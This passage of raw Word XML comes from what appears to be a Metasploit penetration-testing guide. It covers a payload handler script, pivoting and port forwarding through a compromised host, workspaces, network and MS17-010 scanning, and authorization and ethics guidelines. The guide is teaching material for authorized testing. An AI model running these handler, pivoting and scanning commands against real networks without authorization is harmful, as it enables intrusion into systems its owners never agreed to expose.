        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>echo "set LHOST 192.168.1.50" &gt;&gt; handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550A9C0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>echo "exploit -j" &gt;&gt; handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528CF740" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F63D8D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Run resource script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A401E4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>msfconsole -r handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE98675" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>resource handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD80F72" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Advanced Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D55330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Pivoting and Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE56347" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t># Add route through compromised host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E8AF5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>route add 10.0.0.0/24 session_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C5D5FC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAEFD7E" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set up SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F6F30" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9968EA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set SRVPORT 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AC92C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E49A0A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F6518A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA30828" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>portfwd add -l 8080 -p 80 -r target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CA505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Custom Module Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D39D63" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Module locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549C060" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>~/.msf4/modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965DB73" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>/usr/share/metasploit-framework/modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A08392" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE46C1A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Reload modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29140939" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>reload_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B29937" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>reload_lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC8DB9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC5DBA3" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Test custom modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87AA98" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A873C5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Workspace Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E0B6E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Project Organization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B96403" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Create and manage workspaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E93E5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>workspace -a client_pentest_2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC72A4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>workspace -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B86A4C4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>workspace client_pentest_2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BCCF9" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA310CC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Import external scan data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C83FA0" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_import nessus_scan.nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343D849D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_import nmap_results.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37154A4F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D09948" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Export workspace data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B953E2A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_export -f xml -a client_report.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EB763" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:lastRenderedPageBreak/>
        <w:t>Security Testing Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E1A8C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Internal Network Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D2E93" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># 1. Network discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD07C58" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/discovery/arp_sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F059F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C793CE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E272B" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B17497" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># 2. Service enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD281C6" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C95642" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEE6D5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA76CE" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DCBFBC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># 3. Vulnerability identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B475BA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A151FAA" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set RHOSTS 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C6DFC" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C44359" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Wireless Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15588F44" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Wireless auxiliary modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017CE6B1" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>search type:auxiliary wireless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAAD69D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>use auxiliary/scanner/wireless/kismet_logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8155C" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Troubleshooting Common Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135844FA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Connection Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ADED2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Check firewall settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522FA61" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Verify IP addressing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC17C8" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Test connectivity with ping/telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61592481" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DA4254" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Debug payload connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572F65B5" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set Verbose true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505DBEBF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set ExitOnSession false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B981A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Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6FACF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Set threading for scanners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C0971D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>set THREADS 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42720B0D" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1ED18F" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t># Optimize database queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A1AA4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBCC830" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>db_rebuild_cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5158C5A2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00851954">
        <w:t>Legal and Ethical Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2BCC7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Authorization Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E35A44" w14:textId="77777777" w:rsidR="006E6E99" w:rsidRPr="006E6E99" w:rsidRDefault="006E6E99" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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E6E9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Written permission from system owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0AE048" w14:textId="30B5BE21" w:rsidR="006E6E99" w:rsidRPr="006E6E99" w:rsidRDefault="006E6E99" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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E6E9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Clear scope of testing defined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B147C" w14:textId="4213EB51" w:rsidR="006E6E99" w:rsidRPr="006E6E99" w:rsidRDefault="006E6E99" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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E6E9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Rules of engagement established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4BF556" w14:textId="77777777" w:rsidR="006E6E99" w:rsidRPr="006E6E99" w:rsidRDefault="006E6E99" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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E6E9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Emergency contact procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC74010" w14:textId="4DECB29E" w:rsidR="006E6E99" w:rsidRPr="006E6E99" w:rsidRDefault="006E6E99" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104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E6E9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Data handling agreements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A498A" w14:textId="20857431" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="006E6E99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Professional Standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4184A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107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E6E9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Document all activities thoroughly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37148A9A" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107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E6E9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Follow responsible disclosure timelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1606DF" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107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E6E9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Maintain confidentiality of client data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A125315" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107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E6E9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Provide clear, actionable recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A1DB4" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107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E6E9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Ensure minimal impact on production systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B224A65" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="00851954" w:rsidRDefault="00851954" w:rsidP="0085195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851954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Compliance Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8CF3E2" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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E6E9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PCI DSS penetration testing requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23751439" w14:textId="77777777" w:rsidR="00851954" w:rsidRPr="006E6E99" w:rsidRDefault="00851954" w:rsidP="006E6E99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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E6E9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HIPAA security assessments</w:t>
      </w:r>
    </w:p>
